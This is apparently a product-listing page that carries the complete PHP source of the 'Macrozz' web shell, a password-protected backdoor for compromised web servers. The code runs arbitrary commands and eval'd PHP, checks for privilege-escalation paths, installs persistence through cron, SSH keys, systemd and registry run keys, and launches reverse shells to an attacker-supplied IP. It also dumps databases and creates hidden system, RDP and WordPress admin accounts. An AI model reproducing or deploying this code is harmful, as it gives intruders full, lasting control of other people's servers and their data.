Description
<?php
$config_password = ‘allthestarsshining’;
// ========== SESSION START FOR DB CONNECTION ==========
session_start();
// ========== AUTH ==========
if (isset($_POST[‘password’])) {
if (hash(‘sha256’, $_POST[‘password’]) === hash(‘sha256’, $config_password)) {
setcookie(‘ws_auth’, hash(‘sha256’, $config_password), time() + 3600, ‘/’);
header(‘Location: ‘ . $_SERVER[‘PHP_SELF’]);
exit;
} else $error = “Access Denied”;
}
if (!isset($_COOKIE[‘ws_auth’]) || $_COOKIE[‘ws_auth’] !== hash(‘sha256′, $config_password)) {
?><!DOCTYPE html><html><head><title>ACCESS DENIED</title><meta name=”viewport” content=”width=device-width, initial-scale=1″><style>body{background:#0a0a0a;color:#0f0;font-family:’Courier New’,monospace;text-align:center;padding-top:20%;}input{background:#000;border:1px solid #0f0;color:#0f0;padding:10px;}button{background:#0f0;color:#000;border:none;padding:10px 20px;cursor:pointer;}</style></head><body><h1>ACCESS DENIED</h1><form method=”post”><input type=”password” name=”password” placeholder=”ENTER PASSWORD” style=”text-align: center” autofocus><br><br><button type=”submit”>🔓 UNLOCK</button></form><?php if(isset($error)) echo “<p style=’color:#f00′>$error</p>”; ?></body></html><?php exit;
}
// ========== LOGOUT ==========
if (isset($_GET[‘logout’])) {
setcookie(‘ws_auth’, ”, time() – 3600, ‘/’);
session_destroy();
header(‘Location: ‘ . $_SERVER[‘PHP_SELF’]);
exit;
}
// ========== SECURE COMMAND EXECUTION ==========
function run($cmd) {
$out = ”;
$return = 0;
if (function_exists(‘exec’)) {
exec($cmd, $output, $return);
$out = implode(“\n”, $output);
if ($return !== 0) $out .= “\n[!] Return code: $return”;
} elseif (function_exists(‘system’)) {
ob_start();
system($cmd, $return);
$out = ob_get_clean();
if ($return !== 0) $out .= “\n[!] Return code: $return”;
} elseif (function_exists(‘passthru’)) {
ob_start();
passthru($cmd, $return);
$out = ob_get_clean();
if ($return !== 0) $out .= “\n[!] Return code: $return”;
} elseif (function_exists(‘shell_exec’)) {
$out = shell_exec($cmd);
if ($out === null) $out = “[!] Command returned null”;
} else {
$out = “[!] No execution function available”;
}
return $out;
}
function escape($arg) {
return escapeshellarg($arg);
}
function getExecFunctions() {
$funcs = [];
foreach([‘exec’,’system’,’passthru’,’shell_exec’] as $f) if(function_exists($f)) $funcs[]=$f;
return $funcs;
}
function getOS() {
$os = php_uname(‘s’);
if (stripos($os, ‘WIN’) !== false) return ‘windows’;
return ‘linux’;
}
// ========== FILE MANAGER ==========
function cdir() { return isset($_GET[‘dir’]) ? $_GET[‘dir’] : getcwd(); }
function fileTable($dir) {
$files = scandir($dir);
if(!$files) return “<div class=’alert alert-danger’>Cannot read directory</div>”;
$html = “<table class=’table table-bordered’><thead><tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr></thead><tbody>”;
foreach($files as $name) {
if($name==’.’||$name==’..’) continue;
$path = $dir.’/’.$name;
$size = is_file($path) ? filesize($path) : ‘-‘;
$perms = substr(sprintf(‘%o’, fileperms($path)), -4);
$html .= “<tr>
<td><a href=’?dir=”.urlencode($path).”&view=”.(is_dir($path)?’dir’:’file’).”‘>$name</a></td>
<td>$size</td>
<td>$perms</td>
<td>
<a href=’?del=”.urlencode($name).”&dir=”.urlencode($dir).”‘ class=’btn btn-sm btn-danger’ onclick=’return confirm(\”Delete $name?\”)’>Del</a>
<a href=’?rename=”.urlencode($name).”&dir=”.urlencode($dir).”‘ class=’btn btn-sm btn-warning’>Rename</a>
<a href=’?chmod=”.urlencode($name).”&dir=”.urlencode($dir).”‘ class=’btn btn-sm btn-info’>Chmod</a>
“.(is_file($path)?”<a href=’?down=”.urlencode($name).”&dir=”.urlencode($dir).”‘ class=’btn btn-sm btn-success’>Download</a>”:””).”
</td>
</tr>”;
}
$html .= “</tbody></table>”;
return $html;
}
function handleFileActions() {
$d = cdir();
if(isset($_GET[‘del’])) { @unlink($d.’/’.$_GET[‘del’]) ?: @rmdir($d.’/’.$_GET[‘del’]); header(“Location: ?dir=”.urlencode($d)); exit; }
if(isset($_GET[‘down’])) { $f=$d.’/’.$_GET[‘down’]; header(‘Content-Type: application/octet-stream’); header(‘Content-Disposition: attachment; filename=”‘.basename($f).'”‘); readfile($f); exit; }
if(isset($_POST[‘rename_submit’])) { rename($d.’/’.$_POST[‘old’], $d.’/’.$_POST[‘new’]); header(“Location: ?dir=”.urlencode($d)); exit; }
if(isset($_POST[‘chmod_submit’])) { chmod($d.’/’.$_POST[‘file’], octdec($_POST[‘perms’])); header(“Location: ?dir=”.urlencode($d)); exit; }
if(isset($_POST[‘edit_submit’])) { file_put_contents($d.’/’.$_POST[‘file’], $_POST[‘content’]); header(“Location: ?dir=”.urlencode($d)); exit; }
if(isset($_FILES[‘up’])) { move_uploaded_file($_FILES[‘up’][‘tmp_name’], $d.’/’.$_FILES[‘up’][‘name’]); header(“Location: ?dir=”.urlencode($d)); exit; }
if(isset($_POST[‘mkdir’])) { mkdir($d.’/’.$_POST[‘folder’]); header(“Location: ?dir=”.urlencode($d)); exit; }
if(isset($_POST[‘touch’])) { touch($d.’/’.$_POST[‘file’]); header(“Location: ?dir=”.urlencode($d)); exit; }
}
handleFileActions();
$action = isset($_POST[‘feature’]) ? $_POST[‘feature’] : (isset($_GET[‘feature’]) ? $_GET[‘feature’] : ”);
$os = getOS();
// ========== HELPER: DATABASE CONNECTION (FIXED) ==========
function db_connect($host, $user, $pass) {
$conn = @new mysqli($host, $user, $pass);
if($conn->connect_error) return false;
$_SESSION[‘db_host’] = $host;
$_SESSION[‘db_user’] = $user;
$_SESSION[‘db_pass’] = $pass;
return $conn;
}
function db_get_connection() {
if(isset($_SESSION[‘db_host’]) && isset($_SESSION[‘db_user’]) && isset($_SESSION[‘db_pass’])) {
$conn = @new mysqli($_SESSION[‘db_host’], $_SESSION[‘db_user’], $_SESSION[‘db_pass’]);
if(!$conn->connect_error) return $conn;
}
return false;
}
// ========== PRIVILEGE ESCALATION AUTO ==========
function autoPrivEsc() {
$results = [];
// Check current user
$whoami = run(“whoami 2>/dev/null”);
$results[] = “Current user: $whoami”;
// Check sudo -l
$sudo = run(“sudo -l 2>/dev/null”);
if($sudo && !strpos($sudo, “not allowed”)) $results[] = “[+] Sudo privileges found:\n$sudo”;
// Check SUID binaries
$suid = run(“find / -perm -4000 -type f 2>/dev/null | head -20”);
if($suid) $results[] = “[+] Interesting SUID binaries:\n$suid”;
// Check for writable /etc/passwd
if(is_writable(‘/etc/passwd’)) $results[] = “[!] /etc/passwd is writable!”;
// Check for docker group
if(run(“groups”) && strpos(run(“groups”), “docker”) !== false) $results[] = “[!] User in docker group -> can root container”;
// Check for known kernel exploits (simplified)
$kernel = run(“uname -r”);
$results[] = “Kernel: $kernel”;
// DirtyPipe check for kernel 5.8-5.15
if(version_compare($kernel, ‘5.8’, ‘>=’) && version_compare($kernel, ‘5.15’, ‘<=’)) $results[] = “[+] Possible DirtyPipe (CVE-2022-0847)”;
// DirtyCow
if(version_compare($kernel, ‘2.6.22’, ‘>=’) && version_compare($kernel, ‘4.8’, ‘<‘)) $results[] = “[+] Possible DirtyCow (CVE-2016-5195)”;
return implode(“\n”, $results);
}
// ========== PERSISTENCE: MULTI METHODS ==========
function addPersistence($method, $payload) {
$os = getOS();
$result = “”;
if($os == ‘linux’) {
switch($method) {
case ‘cron’:
$cronfile = “/etc/crontab”;
if(is_writable($cronfile)) {
file_put_contents($cronfile, “\n* * * * * root $payload\n”, FILE_APPEND);
$result = “Cron job added to $cronfile”;
} else {
$user_cron = run(“crontab -l 2>/dev/null”);
run(“(echo \”$user_cron\”; echo \”* * * * * $payload\”) | crontab -“);
$result = “Cron job added to user crontab”;
}
break;
case ‘ssh_key’:
$home = run(“echo ~”);
$sshdir = trim($home).”/.ssh”;
if(!is_dir($sshdir)) mkdir($sshdir, 0700);
file_put_contents(“$sshdir/authorized_keys”, $payload.”\n”, FILE_APPEND);
chmod(“$sshdir/authorized_keys”, 0600);
$result = “SSH key appended to $sshdir/authorized_keys”;
break;
case ‘rc_local’:
$rc = “/etc/rc.local”;
if(is_writable($rc)) {
file_put_contents($rc, str_replace(“exit 0”, “$payload\nexit 0”, file_get_contents($rc)));
$result = “Payload added to $rc”;
} else $result = “rc.local not writable”;
break;
case ‘systemd’:
$service = “/etc/systemd/system/persist.service”;
$content = “[Unit]\nDescription=Persist\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=$payload\nRestart=always\n\n[Install]\nWantedBy=multi-user.target”;
if(is_writable(dirname($service))) {
file_put_contents($service, $content);
run(“systemctl enable persist.service && systemctl start persist.service”);
$result = “Systemd service added”;
} else $result = “Cannot write systemd service”;
break;
default: $result = “Unknown method”;
}
} elseif($os == ‘windows’) {
switch($method) {
case ‘startup’:
$startup = getenv(‘APPDATA’) . “\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat”;
file_put_contents($startup, $payload);
$result = “Payload added to Startup folder”;
break;
case ‘registry’:
run(“reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v persist /t REG_SZ /d \”$payload\” /f”);
$result = “Registry run key added”;
break;
case ‘schtask’:
run(“schtasks /create /tn Persist /tr \”$payload\” /sc onlogon /ru SYSTEM /f”);
$result = “Scheduled task created”;
break;
default: $result = “Unknown method”;
}
}
return $result;
}
// ========== UPLOAD BYPASS (try multiple extensions) ==========
function uploadBypass($file_tmp, $target_dir, $original_name) {
$extensions = [‘php’, ‘php5’, ‘phtml’, ‘php7’, ‘phar’, ‘inc’, ‘cgi’, ‘fcgi’, ‘jpeg’, ‘jpg’, ‘gif’, ‘png’, ‘txt’, ‘html’, ‘js’];
foreach($extensions as $ext) {
$new_name = substr(md5(rand()), 0, 8) . “.$ext”;
$path = $target_dir . ‘/’ . $new_name;
if(move_uploaded_file($file_tmp, $path)) return $path;
}
return false;
}
// ========== REVERSE SHELL GENERATOR ==========
function reverseShellCmd($ip, $port, $method=’bash’) {
$cmds = [
‘bash’ => “bash -i >& /dev/tcp/$ip/$port 0>&1”,
‘nc’ => “nc -e /bin/sh $ip $port”,
‘php’ => “php -r ‘\$sock=fsockopen(\”$ip\”,$port);exec(\”/bin/sh -i <&3 >&3 2>&3\”);'”,
‘python’ => “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”$ip\”,$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\”/bin/sh\”,\”-i\”]);'”,
‘perl’ => “perl -e ‘use Socket;\$i=\”$ip\”;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>&S\”);open(STDOUT,\”>&S\”);open(STDERR,\”>&S\”);exec(\”/bin/sh -i\”);};'”
];
return isset($cmds[$method]) ? $cmds[$method] : $cmds[‘bash’];
}
// ========== PORT SCANNER ==========
function portScan($host, $ports) {
$open = [];
foreach(explode(‘,’, $ports) as $port) {
$port = trim($port);
$sock = @fsockopen($host, $port, $errno, $errstr, 1);
if($sock) {
$open[] = $port;
fclose($sock);
}
}
return implode(‘, ‘, $open);
}
// ========== DOWNLOAD FROM URL ==========
function downloadFile($url, $path) {
$ch = curl_init($url);
$fp = fopen($path, ‘wb’);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_exec($ch);
curl_close($ch);
fclose($fp);
return file_exists($path);
}
// ========== FIND FILES ==========
function findFiles($path, $pattern) {
$cmd = “find “.escape($path).” -type f -name “.escape($pattern).” 2>/dev/null”;
return run($cmd);
}
// ========== EVAL PHP CODE ==========
function evalCode($code) {
ob_start();
eval($code);
return ob_get_clean();
}
// ========== DATABASE DUMP (without mysqldump) ==========
function dumpDatabase($host, $user, $pass, $dbname) {
$conn = new mysqli($host, $user, $pass, $dbname);
if($conn->connect_error) return “Connection failed: “.$conn->connect_error;
$tables = [];
$res = $conn->query(“SHOW TABLES”);
while($row = $res->fetch_array()) $tables[] = $row[0];
$dump = “– Database: $dbname\n– Dumped by Macrozz SHELL\n\n”;
foreach($tables as $table) {
$dump .= “– Table: $table\nDROP TABLE IF EXISTS `$table`;\n”;
$create = $conn->query(“SHOW CREATE TABLE $table”)->fetch_assoc();
$dump .= $create[‘Create Table’].”;\n\n”;
$rows = $conn->query(“SELECT * FROM $table”);
while($row = $rows->fetch_assoc()) {
$dump .= “INSERT INTO `$table` VALUES (“;
$vals = array_map(function($v) use ($conn) { return “‘”.$conn->real_escape_string($v).”‘”; }, $row);
$dump .= implode(‘,’, $vals) . “);\n”;
}
$dump .= “\n”;
}
$conn->close();
return $dump;
}
// ========== HTML STARTS ==========
?>
<!DOCTYPE html>
<html>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1″>
<title> Macrozz</title>
<link href=”https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css” rel=”stylesheet”>
<link rel=”stylesheet” href=”https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css”>
<style>
body { background: #0a0a0a; color: #0f0; font-family: ‘Courier New’, monospace; }
.glow-text { text-shadow: 0 0 5px #0f0, 0 0 10px #0f0; }
.card { background: rgba(0,0,0,0.85); border: 1px solid #0f0; border-radius: 0; margin-bottom: 20px; }
.card-header { background: #000; border-bottom: 1px solid #0f0; color: #0f0; font-weight: bold; text-transform: uppercase; }
.btn, button, input, select, textarea { background: #111; border: 1px solid #0f0; color: #0f0; border-radius: 0; }
.btn:hover, button:hover { background: #0f0; color: #000; box-shadow: 0 0 15px #0f0; }
pre { background: #111; border: 1px solid #0f0; color: #0f0; padding: 10px; white-space: pre-wrap; }
.table, .table a { color: #0f0; border-color: #0f0; }
.sidebar { background: #000; border-right: 1px solid #0f0; min-height: 100vh; }
.sidebar a { color: #0f0; display: block; padding: 10px 15px; text-decoration: none; }
.sidebar a:hover { background: #0f0; color: #000; }
</style>
</head>
<body>
<div class=”container-fluid”>
<div class=”row”>
<div class=”col-md-2 sidebar p-3″>
<h3 class=”glow-text text-center”><i class=”fas fa-skull”></i> Macrozz</h3>
<hr class=”border-success”>
<a href=”?feature=terminal”><i class=”fas fa-terminal”></i> TERMINAL</a>
<a href=”?feature=priv_esc”><i class=”fas fa-arrow-up”></i> PRIV ESC (AUTO)</a>
<a href=”?feature=persistence”><i class=”fas fa-infinity”></i> PERSISTENCE</a>
<a href=”?feature=upload_bypass”><i class=”fas fa-upload”></i> UPLOAD BYPASS</a>
<a href=”?feature=reverse_shell”><i class=”fas fa-plug”></i> REVERSE SHELL</a>
<a href=”?feature=port_scanner”><i class=”fas fa-network-wired”></i> PORT SCANNER</a>
<a href=”?feature=find_files”><i class=”fas fa-search”></i> FIND FILES</a>
<a href=”?feature=eval_php”><i class=”fab fa-php”></i> EVAL PHP</a>
<a href=”?feature=download_url”><i class=”fas fa-download”></i> DOWNLOAD URL</a>
<a href=”?feature=adminer”><i class=”fas fa-database”></i> DATABASE (Adminer)</a>
<a href=”?feature=dump_sql”><i class=”fas fa-database”></i> DUMP SQL</a>
<a href=”?feature=create_user”><i class=”fas fa-user-plus”></i> CREATE USER</a>
<a href=”?feature=create_rdp”><i class=”fas fa-desktop”></i> CREATE RDP</a>
<a href=”?feature=hash_id”><i class=”fas fa-hashtag”></i> HASH ID</a>
<a href=”?feature=cpanel_reset”><i class=”fas fa-sync-alt”></i> CPANEL RESET</a>
<a href=”?feature=create_wp_user”><i class=”fab fa-wordpress”></i> CREATE WP USER</a>
<hr class=”border-success”>
<a href=”?logout=1″><i class=”fas fa-sign-out-alt”></i> EXIT</a>
</div>
<div class=”col-md-10 content p-4″>
<div class=”card”>
<div class=”card-header”><i class=”fas fa-folder-open”></i> FILE MANAGER :: <?= htmlspecialchars(cdir()) ?></div>
<div class=”card-body”>
<div class=”row mb-3″>
<div class=”col-md-3″><form method=”post”><input type=”text” name=”folder” placeholder=”FOLDER” class=”form-control-sm”><button name=”mkdir”>+FOLDER</button></form></div>
<div class=”col-md-3″><form method=”post”><input type=”text” name=”file” placeholder=”FILE” class=”form-control-sm”><button name=”touch”>+FILE</button></form></div>
<div class=”col-md-6 text-end”><form method=”post” enctype=”multipart/form-data”><input type=”file” name=”up” class=”form-control-sm”><button>UPLOAD</button></form></div>
</div>
<?= fileTable(cdir()) ?>
<?php if(isset($_GET[‘rename’])): ?><hr><h5>RENAME: <?= htmlspecialchars($_GET[‘rename’]) ?></h5><form method=”post”><input type=”text” name=”new” value=”<?= htmlspecialchars($_GET[‘rename’]) ?>”><input type=”hidden” name=”old” value=”<?= htmlspecialchars($_GET[‘rename’]) ?>”><input type=”hidden” name=”rename_submit” value=”1″><button>RENAME</button></form><?php endif; ?>
<?php if(isset($_GET[‘chmod’])): $p=cDir().’/’.$_GET[‘chmod’]; $pr=substr(sprintf(‘%o’, fileperms($p)), -4); ?><hr><h5>CHMOD: <?= htmlspecialchars($_GET[‘chmod’]) ?></h5><form method=”post”><input type=”text” name=”perms” value=”<?= $pr ?>”><input type=”hidden” name=”file” value=”<?= htmlspecialchars($_GET[‘chmod’]) ?>”><input type=”hidden” name=”chmod_submit” value=”1″><button>SET</button></form><?php endif; ?>
<?php if(isset($_GET[‘view’]) && !is_dir($_GET[‘view’])): ?><hr><h5>EDIT: <?= htmlspecialchars($_GET[‘view’]) ?></h5><form method=”post”><textarea name=”content” rows=”20″><?= htmlspecialchars(file_get_contents($_GET[‘view’])) ?></textarea><input type=”hidden” name=”file” value=”<?= basename($_GET[‘view’]) ?>”><input type=”hidden” name=”edit_submit” value=”1″><button>SAVE</button></form><?php endif; ?>
</div>
</div>
<?php if($action): ?>
<div class=”card mt-3″>
<div class=”card-header”>âš¡ <?= strtoupper(str_replace(‘_’,’ ‘,$action)) ?> âš¡</div>
<div class=”card-body”>
<?php switch($action):
case ‘terminal’: ?>
<p>Available exec functions: <?= implode(‘, ‘, getExecFunctions()) ?></p>
<form method=”post”><input type=”hidden” name=”feature” value=”terminal”><div class=”input-group”><input type=”text” name=”cmd” class=”form-control” placeholder=”command” autofocus><button>EXECUTE</button></div></form>
<?php if(isset($_POST[‘cmd’])) echo “<pre>”.htmlspecialchars(run($_POST[‘cmd’])).”</pre>”; ?>
<?php break;
case ‘priv_esc’: ?>
<pre><?= htmlspecialchars(autoPrivEsc()) ?></pre>
<?php break;
case ‘persistence’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”persistence”>
<select name=”persist_method” class=”form-select”><?php if($os==’linux’) { echo ‘<option value=”cron”>Cron</option><option value=”ssh_key”>SSH Key</option><option value=”rc_local”>rc.local</option><option value=”systemd”>Systemd</option>’; } else { echo ‘<option value=”startup”>Startup Folder</option><option value=”registry”>Registry Run</option><option value=”schtask”>Scheduled Task</option>’; } ?></select>
<textarea name=”persist_payload” class=”form-control mt-2″ placeholder=”Command/payload to run” rows=”3″></textarea>
<button class=”btn mt-2″>ADD PERSISTENCE</button>
</form>
<?php if(isset($_POST[‘persist_method’])) echo “<pre>”.htmlspecialchars(addPersistence($_POST[‘persist_method’], $_POST[‘persist_payload’])).”</pre>”; ?>
<?php break;
case ‘upload_bypass’: ?>
<form method=”post” enctype=”multipart/form-data”><input type=”hidden” name=”feature” value=”upload_bypass”><input type=”file” name=”bypass_file”><button>UPLOAD (BYPASS)</button></form>
<?php if(isset($_FILES[‘bypass_file’])) { $target = getcwd().’/’; $res = uploadBypass($_FILES[‘bypass_file’][‘tmp_name’], $target, $_FILES[‘bypass_file’][‘name’]); echo “<pre>Uploaded to: $res</pre>”; } ?>
<?php break;
case ‘reverse_shell’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”reverse_shell”><input type=”text” name=”rev_ip” placeholder=”Your IP” class=”form-control”><input type=”text” name=”rev_port” placeholder=”Port” class=”form-control”><select name=”rev_method” class=”form-select”><option value=”bash”>Bash</option><option value=”nc”>Netcat</option><option value=”php”>PHP</option><option value=”python”>Python</option><option value=”perl”>Perl</option></select><button>GENERATE & EXECUTE</button></form>
<?php if(isset($_POST[‘rev_ip’])) { $cmd = reverseShellCmd($_POST[‘rev_ip’], $_POST[‘rev_port’], $_POST[‘rev_method’]); run(“nohup $cmd >/dev/null 2>&1 &”); echo “<pre>Executed: $cmd (background)</pre>”; } ?>
<?php break;
case ‘port_scanner’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”port_scanner”><input type=”text” name=”scan_host” placeholder=”Host/IP” class=”form-control”><input type=”text” name=”scan_ports” placeholder=”Ports (comma: 22,80,443)” class=”form-control”><button>SCAN</button></form>
<?php if(isset($_POST[‘scan_host’])) echo “<pre>Open ports: “.htmlspecialchars(portScan($_POST[‘scan_host’], $_POST[‘scan_ports’])).”</pre>”; ?>
<?php break;
case ‘find_files’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”find_files”><input type=”text” name=”find_path” placeholder=”Path (e.g., /var/www)” class=”form-control” value=”.”><input type=”text” name=”find_pattern” placeholder=”Pattern (e.g., *.php, config*)” class=”form-control”><button>FIND</button></form>
<?php if(isset($_POST[‘find_pattern’])) echo “<pre>”.htmlspecialchars(findFiles($_POST[‘find_path’], $_POST[‘find_pattern’])).”</pre>”; ?>
<?php break;
case ‘eval_php’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”eval_php”><textarea name=”php_code” rows=”10″ class=”form-control” placeholder=”echo system(‘id’);”></textarea><button>EVALUATE</button></form>
<?php if(isset($_POST[‘php_code’])) echo “<pre>”.htmlspecialchars(evalCode($_POST[‘php_code’])).”</pre>”; ?>
<?php break;
case ‘download_url’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”download_url”><input type=”text” name=”dl_url” placeholder=”https://example.com/file” class=”form-control”><input type=”text” name=”dl_path” placeholder=”Save as (path)” class=”form-control”><button>DOWNLOAD</button></form>
<?php if(isset($_POST[‘dl_url’])) { $ok = downloadFile($_POST[‘dl_url’], $_POST[‘dl_path’]); echo “<pre>Download “.($ok?”successful”:”failed”).” to “.htmlspecialchars($_POST[‘dl_path’]).”</pre>”; } ?>
<?php break;
case ‘adminer’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”adminer”><input type=”text” name=”db_host” placeholder=”Host” value=”localhost”><input type=”text” name=”db_user” placeholder=”User”><input type=”password” name=”db_pass” placeholder=”Pass”><button name=”db_connect”>CONNECT</button></form>
<?php if(isset($_POST[‘db_connect’])) { $conn = db_connect($_POST[‘db_host’], $_POST[‘db_user’], $_POST[‘db_pass’]); if($conn) { echo “<div class=’alert alert-success’>Connected. Databases:</div><ul>”; $res = $conn->query(“SHOW DATABASES”); while($row = $res->fetch_assoc()) echo “<li>”.$row[‘Database’].”</li>”; echo “</ul>”; } else echo “<div class=’alert alert-danger’>Connection failed</div>”; } ?>
<?php if(db_get_connection()): ?><form method=”post”><textarea name=”db_query” class=”form-control” placeholder=”SELECT * FROM …”></textarea><button>QUERY</button></form><?php if(isset($_POST[‘db_query’])) { $c = db_get_connection(); $res = $c->query($_POST[‘db_query’]); if($res === true) echo “<div>Query executed.</div>”; elseif($res) { echo “<table class=’table’>”; while($row=$res->fetch_assoc()) { echo “<tr>”; foreach($row as $col) echo “<td>”.htmlspecialchars($col).”</td>”; echo “</tr>”; } echo “</table>”; } else echo “<div>Error: “.$c->error.”</div>”; } ?><?php endif; ?>
<?php break;
case ‘dump_sql’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”dump_sql”><input type=”text” name=”db_host_dump” placeholder=”Host” class=”form-control”><input type=”text” name=”db_user_dump” placeholder=”User”><input type=”password” name=”db_pass_dump” placeholder=”Pass”><input type=”text” name=”db_name_dump” placeholder=”Database name”><button name=”dump_do”>DUMP (via PHP)</button></form>
<?php if(isset($_POST[‘dump_do’])) { $dump = dumpDatabase($_POST[‘db_host_dump’], $_POST[‘db_user_dump’], $_POST[‘db_pass_dump’], $_POST[‘db_name_dump’]); if(strpos($dump, “Connection failed”)===false) { header(‘Content-Type: text/plain’); header(‘Content-Disposition: attachment; filename=”‘.$_POST[‘db_name_dump’].’_dump.sql”‘); echo $dump; exit; } else echo “<pre class=’alert alert-danger’>$dump</pre>”; } ?>
<?php break;
case ‘create_user’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”create_user”><input type=”text” name=”username” placeholder=”Username”><input type=”password” name=”password” placeholder=”Password”><button>CREATE</button></form>
<?php if(isset($_POST[‘username’])) { $cmd = “useradd -m -p ‘”.crypt($_POST[‘password’], ‘$6$rounds=5000$’.substr(md5(rand()),0,16)).”‘ “.escape($_POST[‘username’]); echo “<pre>”.htmlspecialchars(run($cmd)).”</pre>”; } ?>
<?php break;
case ‘create_rdp’: ?>
<?php if($os==’windows’): ?><form method=”post”><input type=”hidden” name=”feature” value=”create_rdp”><input type=”text” name=”rdp_user” placeholder=”Username”><input type=”password” name=”rdp_pass” placeholder=”Password”><button>CREATE RDP USER</button></form><?php if(isset($_POST[‘rdp_user’])) echo “<pre>”.htmlspecialchars(run(“net user “.escape($_POST[‘rdp_user’]).” “.escape($_POST[‘rdp_pass’]).” /add && net localgroup ‘Remote Desktop Users’ “.escape($_POST[‘rdp_user’]).” /add”)).”</pre>”; else echo “<div class=’alert alert-warning’>This feature only works on Windows.</div>”; endif; ?>
<?php break;
case ‘hash_id’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”hash_id”><input type=”text” name=”hash” placeholder=”Enter hash”><button>IDENTIFY</button></form>
<?php if(isset($_POST[‘hash’])) { $h = $_POST[‘hash’]; $l = strlen($h); if(preg_match(‘/^[a-f0-9]{32}$/i’,$h)) echo “MD5”; elseif(preg_match(‘/^[a-f0-9]{40}$/i’,$h)) echo “SHA1”; elseif(preg_match(‘/^[a-f0-9]{64}$/i’,$h)) echo “SHA256”; elseif(preg_match(‘/^[a-f0-9]{128}$/i’,$h)) echo “SHA512”; elseif(preg_match(‘/^\$2[ay]\$.{56}$/’,$h)) echo “bcrypt”; else echo “Unknown”; } ?>
<?php break;
case ‘cpanel_reset’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”cpanel_reset”><input type=”text” name=”cpanel_user” placeholder=”cPanel username”><input type=”password” name=”cpanel_pass” placeholder=”New password”><button>RESET</button></form>
<?php if(isset($_POST[‘cpanel_user’])) { $cmd = “chpasswd <<< ‘”.escape($_POST[‘cpanel_user’]).”:”.escape($_POST[‘cpanel_pass’]).”‘ 2>/dev/null || /scripts/realchpass “.escape($_POST[‘cpanel_user’]).” “.escape($_POST[‘cpanel_pass’]).” 2>/dev/null”; echo “<pre>”.htmlspecialchars(run($cmd)).”</pre>”; } ?>
<?php break;
case ‘create_wp_user’: ?>
<form method=”post”><input type=”hidden” name=”feature” value=”create_wp_user”><input type=”text” name=”wp_path” placeholder=”WP root path”><input type=”text” name=”wp_username” placeholder=”Username”><input type=”password” name=”wp_password” placeholder=”Password”><input type=”email” name=”wp_email” placeholder=”Email”><button>CREATE ADMIN</button></form>
<?php if(isset($_POST[‘wp_path’]) && file_exists($_POST[‘wp_path’].’/wp-config.php’)) { define(‘WP_USE_THEMES’,false); require($_POST[‘wp_path’].’/wp-load.php’); $uid = wp_create_user($_POST[‘wp_username’], $_POST[‘wp_password’], $_POST[‘wp_email’]); if(!is_wp_error($uid)) { $u = new WP_User($uid); $u->set_role(‘administrator’); echo “<div class=’alert alert-success’>WP Admin created: “.htmlspecialchars($_POST[‘wp_username’]).”</div>”; } else echo “<div class=’alert alert-danger’>Error: “.$uid->get_error_message().”</div>”; } elseif(isset($_POST[‘wp_path’])) echo “<div class=’alert alert-danger’>wp-config.php not found.</div>”; ?>
<?php break;
endswitch; ?>
</div>
</div>
<?php endif; ?>
</div>
</div>
</div>
</body>
</html>





Reviews
There are no reviews yet.